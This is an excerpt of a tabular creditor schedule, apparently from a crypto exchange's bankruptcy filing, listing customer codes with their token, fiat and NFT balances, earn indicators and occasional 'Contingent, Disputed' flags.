| 07334914 | | USD[22.39] | | |
| 07334915 | | BRZ[4], BTC[0], CUSDT[16], DOGE[4.13874779], ETH[0], TRX[1], USD[0.00], USDT[1.09745625] | Yes | |
| 07334916 | | USD[10.00] | | |
| 07334917 | | BRZ[1], CUSDT[3], TRX[1], USD[0.00] | | |
| 07334918 | | TRX[185.41620003], USD[0.00] | | |
| 07334921 | | DOGE[55.94184956], USD[0.00] | | |
| 07334922 | | DOGE[2], USD[0.01] | | |
| 07334923 | | BTC[.00540675], CUSDT[9], DOGE[3720.0994515], TRX[1], USD[381.24] | | |
| 07334924 | | USD[10.00] | | |
| 07334925 | | USD[10.00] | | |
| 07334926 | | CUSDT[1], DOGE[0], ETH[0.72747569], ETHW[0.72717025], USD[10.96], USDT[1.0962242] | Yes | |
| 07334927 | | USD[10.00] | | |
| 07334928 | | BRZ[2], CUSDT[4], DOGE[2], TRX[3], USD[0.76] | | |
| 07334929 | | USD[10.00] | | |
| 07334930 | | USD[10.00] | | |
| 07334931 | | CUSDT[1], DOGE[.00154216], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334932 | | USD[0.00] | | |
| 07334933 | | DOGE[4.7010613], USD[0.00] | | |
| 07334934 | | BRZ[1], CUSDT[3], USD[0.01] | | |
| 07334935 | | BAT[2.05380883], BTC[.06699882], CUSDT[2], DOGE[8436.72920687], ETH[4.12018958], ETHW[4.11845911], MATIC[222.7029773], SOL[5.15520573], TRX[1], UNI[1.06925837], USD[0.89], USDT[1.06924863] | Yes | |
| 07334936 | | USD[10.00] | | |
| 07334937 | | BRZ[0], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07334938 | | BRZ[3], CUSDT[24], DOGE[11328.56675775], GRT[2.0776518], SHIB[219319.24492559], TRX[10.00087675], USD[0.01], USDT[1.10608925] | Yes | |
| 07334939 | | BRZ[1], BTC[.00186549], CUSDT[3], DOGE[.00007977], ETH[.08574692], ETHW[.08574692], TRX[1], UNI[3.68174712], USD[0.00] | | |
| 07334940 | | USD[0.00] | | |
| 07334941 | | DOGE[165.44827839], USD[0.00] | | |
| 07334942 | | BTC[0], TRX[14.80893786], USD[0.00], USDT[0] | | |
| 07334943 | | BTC[0], CUSDT[5], DOGE[5686.97065633], ETH[0], TRX[1], USD[0.81], USDT[1] | | |
| 07334944 | | USD[10.00] | | |
| 07334945 | | DOGE[0], USD[10.00] | | |
| 07334946 | | USD[10.00] | | |
| 07334947 | | USD[10.00] | | |
| 07334948 | | AUD[0.00], DOGE[25.29823379], USD[0.00] | | |
| 07334949 | | DOGE[449.94815935], USD[10.00] | | |
| 07334950 | | USD[10.00] | | |
| 07334951 | | USD[10.00] | | |
| 07334952 | | USD[10.00] | | |
| 07334953 | | USD[10.00] | | |
| 07334954 | | DOGE[1104.8041371], USD[0.00] | | |
| 07334955 | | DOGE[151.3042998], USD[2.00] | | |
| 07334956 | | DOGE[20.25615857], TRX[1], USD[0.00] | | |
| 07334957 | | USD[10.00] | | |
| 07334958 | | USD[10.00] | | |
| 07334959 | | USD[10.00] | | |
| 07334960 | | USD[10.00] | | |
| 07334962 | | BAT[1], BRZ[1], CUSDT[3], DOGE[29700.09789855], SHIB[1], TRX[3], USD[0.01] | | |
| 07334963 | | USD[10.00] | | |
| 07334965 | Contingent, Disputed | USD[10.00] | | |
| 07334966 | | CUSDT[2], DOGE[1], LINK[0], USD[0.00] | | |
| 07334967 | | BAT[.00000005], BCH[.00000001], BRZ[2], BTC[.00150787], CUSDT[5], ETH[.01252811], ETHW[.01237763], SOL[.00000008], TRX[3], USD[0.00], USDT[0], YFI[.00000001] | Yes | |
| 07334968 | | CUSDT[1], DOGE[123.23872201], ETH[0], GRT[105.33805257], LINK[0.96930167], SOL[1.30597437], SUSHI[8.85196326], UNI[1.1132877], USD[0.00] | Yes | |
| 07334969 | | USD[10.00] | | |
| 07334970 | | CUSDT[8], GRT[1.0001826], TRX[2], USD[0.01] | Yes | |
| 07334971 | | CUSDT[3], SHIB[16613134.88492119], USD[0.00] | Yes | |
| 07334972 | | CUSDT[2], ETH[.00000005], ETHW[.00000005], USD[0.00] | | |
| 07334973 | | USD[10.00] | | |
| 07334974 | | DOGE[.13069269], TRX[1], USD[0.00] | | |
| 07334975 | | BTC[0], USD[0.01] | | |
| 07334976 | | USD[0.00] | | |
| 07334978 | | USD[10.00] | | |
| 07334979 | | DOGE[.74820405], SHIB[21381609.37143803], TRX[1], USD[1902.32] | Yes | |
| 07334980 | | USD[10.00] | | |
| 07334982 | | USD[10.00] | | |
| 07334983 | | BCH[.00820413], BTC[.00005647], CUSDT[8], DOGE[18.01789905], ETH[.00115448], ETHW[.00114079], KSHIB[87.79452066], LTC[.03362804], SHIB[4671329.81831351], SOL[.0155463], TRX[30.32543539], USD[0.00], YFI[.00009355] | Yes | |
| 07334984 | | USD[10.00] | | |
| 07334985 | | CUSDT[2], DOGE[.0000033], SHIB[172693.90884797], USD[0.21] | Yes | |
| 07334986 | | USD[10.00] | | |
| 07334987 | | BTC[.00021174], USD[0.00] | | |
| 07334988 | | USD[10.00] | | |
| 07334989 | | BTC[.00004405], DOGE[31071.18527194], ETH[.85345834], ETHW[.86055268], SHIB[12], TRX[4], USD[0.01] | Yes | |
| 07334990 | | DOGE[.0077602], USD[10.00] | | |
| 07334991 | | CUSDT[2], DOGE[1.04248902], ETH[.01127525], ETHW[.01127525], TRX[1], USD[0.00] | | |
| 07334992 | | BAT[0], DOGE[1.40592164], ETH[0], ETHW[0], USD[0.00] | | |
| 07334993 | | BRZ[1], CUSDT[10], DOGE[10489.61532908], SHIB[1549208.86769725], TRX[459.40016292], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334994 | | CUSDT[19], TRX[8], USD[0.94] | | |
| 07334995 | | BTC[.00185379], DOGE[5561.64504505], USD[0.00] | | |
| 07334996 | | DOGE[1], USD[0.00] | | |
| 07334997 | | TRX[1], USD[0.00] | | |
| 07334998 | | USD[10.00] | | |
| 07334999 | | USD[10.00] | | |
| 07335000 | | USD[10.00] | | |
| 07335001 | | USD[10.00] | | |
| 07335002 | | USD[10.00] | | |
| 07335003 | | BRZ[2], CUSDT[1], DOGE[1], TRX[2], USD[0.00], USDT[1] | | |
| 07335004 | | BRZ[2], CUSDT[3], DOGE[9798.70112062], GRT[1.00498957], TRX[2], USD[0.00] | Yes | |
| 07335005 | | BAT[4.33132663], BCH[0], BRZ[5.07952967], BTC[0.00065743], CUSDT[11], DOGE[0], NFT (341764524512805958/#10 (J))[1], NFT (35421089140634615/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #39)[1], NFT (357398850624200867/Marcus Allen's Playbook: Kansas City Chiefs vs. Detriot Lions - November 29, 1996 #65)[1], NFT (504210195245036685/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #50)[1], NFT (506634918726797865/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #71)[1], NFT (513032328245292040/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #66)[1], NFT (519016263566483666/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #78)[1], NFT (550073414522224183/#12 (L))[1], SHIB[0], SOL[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07335006 | | CUSDT[2], DOGE[2], TRX[1], USD[0.01] | | |
| 07335007 | | BTC[.0010218], CUSDT[1], USD[0.00] | | |
| 07335008 | | USD[10.00] | | |
| 07335009 | | USD[10.00] | | |
| 07335010 | | BRZ[1], USD[0.00] | | |
| 07335011 | | USD[10.00] | | |
| 07335014 | | USD[10.00] | | |
| 07335015 | | USD[0.00] | | |
| 07335016 | | BRZ[1], CUSDT[2], DOGE[724.46151779], USD[2.34] | | |
| 07335017 | | USD[0.00] | | |
| 07335018 | | USD[10.00] | | |
| 07335019 | | CUSDT[2], USD[29.11] | | |
| 07335020 | | BRZ[1], CUSDT[2], TRX[1], USD[0.01] | | |
| 07335021 | | BTC[0], DOGE[2], USD[10.00] | | |
| 07335022 | | ETH[1.42179101], ETHW[1.42119393], USD[0.00], USDT[0] | Yes | |
| 07335023 | | CUSDT[10], DOGE[1], USD[0.00] | Yes | |
| 07335024 | | BRZ[2], CUSDT[1], DOGE[.15219011], TRX[3], USD[0.23] | | |
| 07335025 | | CUSDT[2], DOGE[.00000895], USD[0.00] | | |
| 07335026 | | USD[10.00] | | |
| 07335027 | | DOGE[160.79144145] | | |
| 07335028 | | DOGE[1], TRX[203.52709255], USD[0.01] | | |
| 07335029 | | CUSDT[6], DOGE[0], ETH[0], GRT[1], LINK[0], TRX[0], USD[0.00] | | |
| 07335030 | | BTC[.00020298], USD[0.00] | | |
| 07335031 | | CUSDT[3], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07335032 | | USD[10.00] | | |
| 07335033 | | USD[10.00] | | |
| 07335034 | | USD[10.00] | | |
| 07335035 | | CUSDT[4], DOGE[1], TRX[1], USD[0.00] | | |
| 07335036 | | BTC[.00071603], CUSDT[3], DOGE[.00067092], SHIB[7.28069824], USD[0.00] | Yes | |
| 07335037 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07335038 | | USD[10.00] | | |
| 07335039 | | BRZ[1], DOGE[946.34968258], TRX[523.64094113], USD[10.00] | | |
| 07335040 | | USD[10.00] | | |
| 07335041 | | USD[10.00] | | |
| 07335042 | | CUSDT[1], USD[0.00] | | |
| 07335043 | | CUSDT[15], DOGE[.00002725], SHIB[1], TRX[1], USD[0.14] | | |
| 07335044 | | USD[10.00] | | |
| 07335045 | | USD[10.00] | | |
| 07335046 | | BRZ[0], BTC[0], CUSDT[2], TRX[1], USD[0.00], USDT[0] | | |
| 07335047 | | USD[10.00] | | |
| 07335048 | | DOGE[744.98249649], TRX[2], USD[5.00] | | |
| 07335049 | | USD[10.00] | | |
| 07335050 | | USD[10.00] | | |
| 07335051 | | BCH[0], BTC[0], ETH[0], ETHW[0], USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335052 | | BAT[1.01655595], BRZ[1], CUSDT[8], DOGE[243.92977727], ETH[.37746194], ETHW[.37730324], GRT[.00000004], LINK[8.32611265], SOL[.00000103], TRX[6], UNI[9.11246746], USD[2707.31] | Yes | |
| 07335053 | | USD[0.00] | | |
| 07335054 | | BRZ[0], USD[0.00] | | |
| 07335055 | | USD[10.00] | | |
| 07335056 | | BRZ[1], BTC[.00421611], CUSDT[21], DOGE[317.78780662], ETH[.19939457], ETHW[.19939457], LTC[.11569782], SUSHI[.45481175], TRX[7], USD[4.03] | | |
| 07335057 | | USD[0.00], USDT[0] | Yes | |
| 07335058 | | USD[0.00], USDT[0] | | |
| 07335059 | | USD[10.00] | | |
| 07335060 | | BRZ[3], CUSDT[1], DOGE[9729.57103789], SHIB[3764852.05039], USD[0.00] | | |
| 07335061 | | USD[10.00] | | |
| 07335062 | | DOGE[20.22581939], USD[0.00] | | |
| 07335063 | | USD[0.00] | | |
| 07335064 | | CUSDT[527.69559393], DOGE[7789.25864942], TRX[2], USD[0.00] | Yes | |
| 07335065 | | ETH[0.23722731], ETHW[0.23702570], SOL[.05380592], USD[0.00] | Yes | |
| 07335066 | | CUSDT[3], DOGE[1], GRT[.00004438], TRX[280.6211718], USD[0.00] | | |
| 07335067 | | USD[10.00] | | |
| 07335068 | | BRZ[3], BTC[0], CUSDT[2], DOGE[1], USD[10.00] | | |
| 07335070 | | DOGE[1], USD[0.00] | | |
| 07335071 | | DOGE[.0000223], USD[0.01] | | |
| 07335072 | | GRT[1], TRX[1], USD[0.00] | | |
| 07335073 | | USD[10.00] | | |
| 07335074 | | DOGE[0], MATIC[0], SHIB[0], TRX[0], USD[0.01] | Yes | |
| 07335075 | | USD[10.00] | | |
| 07335076 | | USD[10.00] | | |
| 07335077 | | BRZ[2], CUSDT[2], DOGE[3], USD[0.01], USDT[0] | | |
| 07335078 | | USD[10.00] | | |
| 07335079 | | BRZ[1], CUSDT[2], DOGE[123.71049836], USD[0.00] | | |
| 07335080 | | CUSDT[1], DOGE[25.56780583], USD[0.00] | | |
| 07335081 | | USD[0.00] | | |
| 07335082 | | USD[0.05] | | |
| 07335083 | | BRZ[2], DOGE[0], GRT[0], LTC[0], TRX[0], USD[0.00] | | |
| 07335084 | | BTC[.00005214], SOL[3], USD[1.44] | | |
| 07335085 | | USD[10.00] | | |
| 07335086 | | BAT[1], BRZ[1], CUSDT[2], TRX[4], USD[0.01] | | |
| 07335087 | | CUSDT[1], DOGE[2], TRX[2], USD[0.01] | Yes | |
| 07335088 | | USD[0.01] | | |
| 07335089 | | USD[10.00] | | |
| 07335090 | | BRZ[2], CUSDT[1], DOGE[0], USD[0.00] | | |
| 07335091 | | DOGE[1.00002454], TRX[1], USD[0.00] | | |
| 07335092 | | BTC[0], DOGE[2134.85604205], SHIB[8598690.55770259], SOL[1.71251460], TRX[0], USD[0.00] | Yes | |
| 07335093 | | BRZ[2], CUSDT[1], TRX[2], USD[166.02] | | |
| 07335094 | | CUSDT[3], DOGE[.00000815], TRX[14.68222535], USD[0.00] | | |
| 07335095 | | BTC[.0001665], CUSDT[2], DOGE[1], LTC[.02156038], SUSHI[.37048795], TRX[1], USD[0.00], YFI[0.00019716] | | |
| 07335096 | | USD[10.00] | | |
| 07335097 | | CUSDT[4], DOGE[.0000093], ETH[.00000753], ETHW[.00000753], USD[196.46] | | |
| 07335098 | | CUSDT[1], DOGE[189.49900848], TRX[1], USD[6.18] | Yes | |
| 07335099 | | USD[10.00] | | |
| 07335100 | | NFT (309383291368370485/FTX - Off The Grid Miami #2307)[1], USD[0.00] | Yes | |
| 07335101 | | USD[10.00] | | |
| 07335102 | | USD[10.00] | | |
| 07335103 | | CUSDT[5], DOGE[68.94469621], USD[0.00] | | |
| 07335104 | | DOGE[6505.35466534], SHIB[346620.45060658], TRX[1], USD[0.00] | | |
| 07335105 | | CUSDT[2], DOGE[0], USD[0.00] | Yes | |
| 07335106 | | USD[10.00] | | |
| 07335107 | | CUSDT[1], DOGE[1], TRX[1], USD[10.00] | | |
| 07335108 | | BRZ[2], CUSDT[3], DOGE[.00188506], TRX[2], USD[0.00] | | |
| 07335109 | | USD[10.00] | | |
| 07335110 | | DOGE[4439.54090108], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335111 | | USD[10.00] | | |
| 07335112 | | USD[0.01], USDT[0] | | |
| 07335113 | | BRZ[1], CUSDT[10], DOGE[0], ETH[.0066035], ETHW[.00652136], TRX[0], USD[0.00] | Yes | |
| 07335114 | | USD[10.00] | | |
| 07335115 | | BTC[0], SUSHI[0], TRX[0], USD[0.01] | Yes | |
| 07335116 | | USD[10.00] | | |
| 07335117 | | AUD[0.00], BAT[9.26748987], BRZ[0], BTC[0], DAI[0], EUR[0.00], SUSHI[0], USD[0.00] | | |
| 07335118 | | CUSDT[13], DOGE[1.01411757], GRT[1], TRX[6], USD[0.00] | | |
| 07335119 | | USD[10.00] | | |
| 07335120 | | USD[10.00] | | |
| 07335121 | | TRX[.77353132], USD[9.31] | Yes | |
| 07335122 | | CUSDT[2], DOGE[2574.32142547], TRX[2], USD[10.01] | | |
| 07335123 | | CUSDT[1], ETH[.14983741], ETHW[.14983741], SUSHI[.69340737], TRX[2], USD[0.00] | | |
| 07335124 | | CUSDT[1], DOGE[1151.599827], USD[0.00] | | |
| 07335125 | | USD[10.00] | | |
| 07335126 | | CUSDT[2], DOGE[185.3457883], TRX[773.03692892], USD[0.00] | | |
| 07335127 | | USD[10.00] | | |
| 07335128 | | USD[0.00] | | |
| 07335129 | | CUSDT[1], DOGE[2.00269197], GRT[0], TRX[1], USD[0.00] | Yes | |
| 07335130 | | USD[10.00] | | |
| 07335131 | | DOGE[122.25729512], USD[0.00] | | |
| 07335132 | | BRZ[1], CUSDT[2], DOGE[1], ETH[0], TRX[2], USD[0.01] | | |
| 07335134 | | USD[10.00] | | |
| 07335135 | | CUSDT[1], DOGE[1979.57014434], TRX[318.23494116], USD[0.00] | Yes | |
| 07335136 | | USD[10.00] | | |
| 07335137 | | USD[10.00] | | |
| 07335138 | | CUSDT[1], DOGE[14528.37044368], TRX[1], USD[0.01] | | |
| 07335139 | | CUSDT[2], TRX[2], USD[0.00] | | |
| 07335140 | | DOGE[133.85476008], USD[0.00] | | |
| 07335141 | | DOGE[.42238393], USD[17.70] | | |
| 07335142 | | BRZ[1], BTC[0.00316174], CUSDT[15], DOGE[0], ETH[0], GRT[1], LTC[0], TRX[4], USD[0.00] | | |
| 07335143 | | BRZ[2.00000508], CUSDT[1], LTC[.0131962], USD[0.00], USDT[0.00000143] | | |
| 07335144 | | USD[10.00] | | |
| 07335145 | | USD[10.00] | | |
| 07335146 | | LTC[0], SOL[0], USD[0.00] | Yes | |
| 07335147 | | USD[10.00] | | |
| 07335149 | | USD[0.18] | | |
| 07335150 | | DOGE[1303.6819036], USD[10.00] | | |
| 07335151 | | BRZ[0], CUSDT[1], DOGE[1.03243924], TRX[1], USD[0.00], USDT[0] | | |
| 07335152 | | USD[10.00] | | |
| 07335153 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07335154 | | BAT[2], BRZ[1], CUSDT[8], GRT[2], TRX[6], USD[0.00], USDT[1] | | |
| 07335155 | | USD[10.00] | | |
| 07335156 | | USD[10.00] | | |
| 07335157 | | USD[10.00] | | |
| 07335158 | | DOGE[36.77013488], USD[0.00] | | |
| 07335159 | | DOGE[11.76062757], GRT[4.54552851], USD[0.00] | | |
| 07335160 | | DOGE[36.16878002], USD[0.00] | | |
| 07335161 | | CUSDT[1], DOGE[32444.31556767], ETH[.19385663], ETHW[.19385663], TRX[2], USD[0.04] | | |
| 07335162 | | USD[10.00] | | |
| 07335163 | | BTC[.0001731], DOGE[307.8668919], USD[0.00] | | |
| 07335164 | | USD[10.00] | | |
| 07335165 | | DOGE[8.45384765], SHIB[1], USD[0.01] | Yes | |
| 07335166 | | CUSDT[5], DOGE[2], KSHIB[141.72774626], NFT (35880240708451910/Astral Apes #1177[1], SOL[.00000001], TRX[2], USD[0.84], USDT[0.92280000] | Yes | |
| 07335168 | | USD[10.00] | | |
| 07335169 | | USD[10.00] | | |
| 07335170 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335172 | | BCH[0], BRZ[7.96432416], BTC[0], ETHW[.03271963], NFT (309522223920466493/Roar )[1], NFT (321134736573745002/Infinity #11)[1], NFT (328865060291940159/Jackpots )[1], NFT (332946058995934098/Memories )[1], NFT (350476917411151493/Chiefs #2)[1], NFT (409300521323117301/Pool day )[1], NFT (417106150700498664/Rose Bowl )[1], NFT (538661235469906613/Hardrock )[1], TRX[0], USD[2134.56], USDT[0] | Yes | |
| 07335173 | | DOGE[0], USD[0.01] | | |
| 07335174 | | DOGE[1.00000371], USD[0.86] | | |
| 07335175 | | USD[10.00] | | |
| 07335176 | | DOGE[15.35110483], USD[0.47] | | |
| 07335177 | | BTC[.00419481], USD[0.00] | | |
| 07335178 | | BTC[0], CUSDT[1], DOGE[0.00001700], USD[0.00] | | |
| 07335180 | | USD[0.01] | | |
| 07335181 | | USD[10.00] | | |
| 07335182 | | BRZ[1], USD[0.00] | | |
| 07335183 | Contingent, Disputed | BTC[.00002508], CAD[0.27], USD[0.00] | | |
| 07335184 | | USD[10.00] | | |
| 07335185 | | BAT[100.29867481], BRZ[1], BTC[.03681239], CUSDT[1], DOGE[4217.0781704], LINK[40.64611306], SHIB[186889.68554794], TRX[3], USD[0.00] | Yes | |
| 07335186 | | USD[10.00] | | |
| 07335187 | | USD[10.00] | | |
| 07335188 | | USD[10.00] | | |
| 07335189 | | USD[10.00] | | |
| 07335190 | | DOGE[0], TRX[33.47435267], USD[0.00] | | |
| 07335191 | | USD[387.06] | | |
| 07335192 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07335193 | | BAT[1], BRZ[2], CUSDT[6], ETH[.00113343], ETHW[.00113343], GRT[.16160797], TRX[1.78961941], USD[0.87], USDT[0.70546430] | | |
| 07335194 | | BAT[29.60884264], BRZ[0], CUSDT[1], DOGE[21565.17155904], SUSHI[.8065037], TRX[1], USD[1782.57] | | |
| 07335196 | | TRX[1], USD[0.19], USDT[0.00023775] | | |
| 07335197 | | SOL[.00002868], USD[0.00] | Yes | |
| 07335198 | | USD[0.01] | | |
| 07335201 | | USD[10.00] | | |
| 07335202 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07335203 | | USD[10.00] | | |
| 07335204 | | USD[10.00] | | |
| 07335205 | | USD[10.00] | | |
| 07335206 | | DOGE[0], USD[0.00] | Yes | |
| 07335207 | | USD[10.00] | | |
| 07335208 | | DOGE[136.32079445], USD[0.00] | | |
| 07335209 | | USD[10.00] | | |
| 07335211 | | BAT[2.28208843], BRZ[3], BTC[.0002344], CUSDT[19], DOGE[754.02218289], ETH[.02547934], ETHW[.0251647], GRT[5.28852751], SOL[.93909473], SUSHI[1.20907841], TRX[613.32330227], USD[0.01] | Yes | |
| 07335213 | | USD[10.00] | | |
| 07335214 | | USD[110.00] | | |
| 07335215 | | BAT[1], BRZ[1], DOGE[63.93864524], TRX[1], USD[0.78] | | |
| 07335216 | | CUSDT[2], DOGE[0.00104353], ETH[.00000565], ETHW[.00000565], TRX[1], USD[0.00] | Yes | |
| 07335217 | | BRZ[5], BTC[0.00000117], CUSDT[6], DOGE[6.00035681], LINK[.0000432], SOL[.00057413], TRX[5], UNI[.00066737], USD[0.00], USDT[1] | | |
| 07335218 | | USD[10.00] | | |
| 07335220 | | USD[10.00] | | |
| 07335221 | | BAT[1], BRZ[1], CUSDT[2], DOGE[.14317731], TRX[1], USD[0.01], USDT[1] | | |
| 07335222 | | DOGE[147.46157269], USD[0.00] | Yes | |
| 07335223 | | USD[10.00] | | |
| 07335224 | | BTC[0], CUSDT[1], DOGE[5189.68085906], TRX[233.19208213], USD[0.00] | Yes | |
| 07335225 | | USD[10.00] | | |
| 07335226 | | USD[0.18] | | |
| 07335227 | | USD[10.00] | | |
| 07335228 | | DOGE[1], ETH[.00093656], ETHW[.00092288], USD[0.00] | Yes | |
| 07335229 | | USD[10.00] | | |
| 07335230 | | BTC[0], DOGE[0], ETH[0], TRX[2], USD[0.00] | | |
| 07335231 | | BAT[199.89990007], BRZ[1], BTC[0.00429480], CUSDT[3], DAI[0], DOGE[448.14972066], ETH[0], GRT[7.06562289], LINK[10.66936610], SOL[.00000916], SUSHI[1.56366777], TRX[1670.28848614], UNI[2.42795757], USD[0.00], YFI[.00166387] | Yes | |
| 07335232 | | USD[10.00] | | |
| 07335233 | | DOGE[1], TRX[843.4333066], USD[0.00] | | |
| 07335234 | | USD[10.00] | | |
| 07335235 | | DOGE[1.63217762], USD[9.34] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335236 | | CUSDT[9], DOGE[2.48522233], TRX[1], USD[0.31] | | |
| 07335237 | | USD[0.00] | Yes | |
| 07335238 | | USD[10.00] | | |
| 07335239 | | USD[10.00] | | |
| 07335240 | | USD[10.00] | | |
| 07335241 | | CUSDT[1], SHIB[2686876.24717893], TRX[1], USD[0.00] | | |
| 07335242 | | USD[10.00] | | |
| 07335243 | | CUSDT[1], DOGE[3174.83940831], TRX[1], USD[3.32] | Yes | |
| 07335244 | | USD[10.00] | | |
| 07335245 | | CUSDT[4], DOGE[1], TRX[2], USD[0.01] | | |
| 07335246 | | CUSDT[4], DOGE[154.9742428], USD[0.00] | | |
| 07335247 | | BAT[1.00132499], BRZ[1], CUSDT[4], DOGE[21888.27324596], SHIB[3726080.82117682], TRX[169.51628525], USD[3.37] | Yes | |
| 07335248 | | ETH[.69553024], ETHW[.69523179], USD[0.00], USDT[0] | Yes | |
| 07335249 | | USD[10.00] | | |
| 07335250 | | USD[10.00] | | |
| 07335251 | | DOGE[829.46556037], ETH[.0000005], ETHW[2.0455889], SHIB[509991.20683342], TRX[905.40783231], USD[0.00] | Yes | |
| 07335252 | | USD[10.00] | | |
| 07335253 | | DOGE[6101.8093728], TRX[2], USD[500.02] | | |
| 07335254 | | USD[10.00] | | |
| 07335255 | | USD[10.00] | | |
| 07335256 | | USD[10.00] | | |
| 07335257 | | BTC[0], CUSDT[15], DOGE[1], TRX[6], USD[187.48], USDT[0] | Yes | |
| 07335258 | | USD[10.00] | | |
| 07335260 | | BAT[5.59969268], BTC[0], CUSDT[2], DOGE[0.01120939], ETH[0], GRT[5.93799785], LTC[0.03647644], SHIB[1], SOL[0], SUSHI[0.34753516], USD[0.00], USDT[0] | Yes | |
| 07335261 | | USD[10.00] | | |
| 07335262 | | DOGE[1], USD[0.00] | | |
| 07335263 | | USD[10.00] | | |
| 07335264 | | CUSDT[2], DOGE[35.05694024], USD[0.00] | | |
| 07335265 | | BRZ[2], CUSDT[7], DOGE[3], GRT[1], LTC[1.00120159], TRX[2], USD[0.03] | | |
| 07335266 | | USD[10.00] | | |
| 07335267 | | CUSDT[2], USD[0.00] | | |
| 07335268 | | USD[10.00] | | |
| 07335269 | | DOGE[92093615], TRX[1], USD[0.98], USDT[1] | | |
| 07335270 | | CUSDT[2], DOGE[20498.47783437], TRX[2], USD[0.00] | | |
| 07335271 | | DOGE[672.75850401], ETH[.01916166], ETHW[.0189291], LTC[.04812237], SOL[7.42180426], TRX[763.56319211], USD[0.00] | Yes | |
| 07335272 | | BRZ[2], CUSDT[2], ETH[0], LTC[0], NFT (496763123208516117/Bahrain Ticket Stub #1005)[1], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07335273 | | USD[10.00] | | |
| 07335274 | | USD[0.00] | | |
| 07335275 | | CUSDT[1], DOGE[7285.37432471], GRT[1], USD[0.00] | | |
| 07335276 | | USD[10.00] | | |
| 07335277 | | USD[10.00] | | |
| 07335278 | | USD[10.00] | | |
| 07335279 | | BTC[0], ETH[0], TRX[.011145], USD[0.65], USDT[0] | | |
| 07335280 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07335281 | | BTC[.0002481], USD[0.00] | | |
| 07335282 | | USD[10.00] | | |
| 07335283 | | BRZ[3], BTC[.00122122], CUSDT[30], SHIB[553458.27517826], TRX[1], USD[0.00], USDT[1.10805062] | Yes | |
| 07335284 | | USD[0.01], USDT[0] | | |
| 07335285 | | USD[10.00] | | |
| 07335286 | | DOGE[0], SOL[0], TRX[1], USD[0.00] | | |
| 07335287 | | DOGE[3135.83550859], TRX[2], USD[0.00] | | |
| 07335289 | | USD[10.00] | | |
| 07335290 | | USD[10.00] | | |
| 07335291 | | CUSDT[9], USD[0.00] | | |
| 07335292 | | USD[10.00] | | |
| 07335293 | | BF_POINT[100], CUSDT[4], DOGE[1], SHIB[754850.87162839], SOL[.00000001], TRX[1], USD[0.00] | Yes | |
| 07335294 | | CUSDT[3.00042133], DOGE[2], LTC[.04216182], TRX[1], USD[0.00] | | |
| 07335295 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335296 | | USD[10.00] | | |
| 07335297 | | USD[10.00] | | |
| 07335298 | | SOL[.00000001], USD[0.01], USDT[0] | Yes | |
| 07335299 | | USD[10.00] | | |
| 07335300 | | USD[10.00] | | |
| 07335301 | | CUSDT[1], DOGE[0], USD[0.00], USDT[0.00000001] | | |
| 07335302 | | USD[0.00] | | |
| 07335303 | | CUSDT[1], DOGE[1066.92878482], ETH[.02530986], ETHW[.02530986], USD[0.00] | | |
| 07335304 | | USD[10.00] | | |
| 07335305 | | CUSDT[3], DOGE[1], ETH[0], SHIB[2], USD[0.00], USDT[0] | Yes | |
| 07335306 | | USD[10.00] | | |
| 07335307 | | USD[10.00] | | |
| 07335308 | | USD[10.00] | | |
| 07335309 | | USD[10.00] | | |
| 07335310 | | USD[0.00] | | |
| 07335311 | | USD[10.00] | | |
| 07335312 | | GRT[1], USD[0.04] | | |
| 07335313 | | USD[10.00] | | |
| 07335314 | | DOGE[134.77419527], USD[0.00] | | |
| 07335315 | | BRZ[3], CUSDT[5], DOGE[.00002264], SOL[1], TRX[1], USD[0.00], USDT[1] | | |
| 07335316 | | USD[0.00] | | |
| 07335317 | | DOGE[58.96541232], USD[0.00] | | |
| 07335318 | | BRZ[1], CUSDT[136.28381804], DOGE[6.00047492], KSHIB[139.86144556], PAXG[.00000017], SHIB[5], TRX[7], USD[0.01] | Yes | |
| 07335319 | | TRX[1], USD[0.01], USDT[0] | | |
| 07335320 | | BRZ[3], DOGE[8996.2514207], ETH[.00577978], ETHW[.00577978], USD[0.00] | | |
| 07335321 | | USD[10.00] | | |
| 07335322 | | USD[10.00] | | |
| 07335323 | | USD[10.00] | | |
| 07335324 | | DOGE[2], USD[0.01] | Yes | |
| 07335325 | | BTC[0], DOGE[1], ETH[0], ETHW[0], GRT[0], LINK[0], USD[0.00] | | |
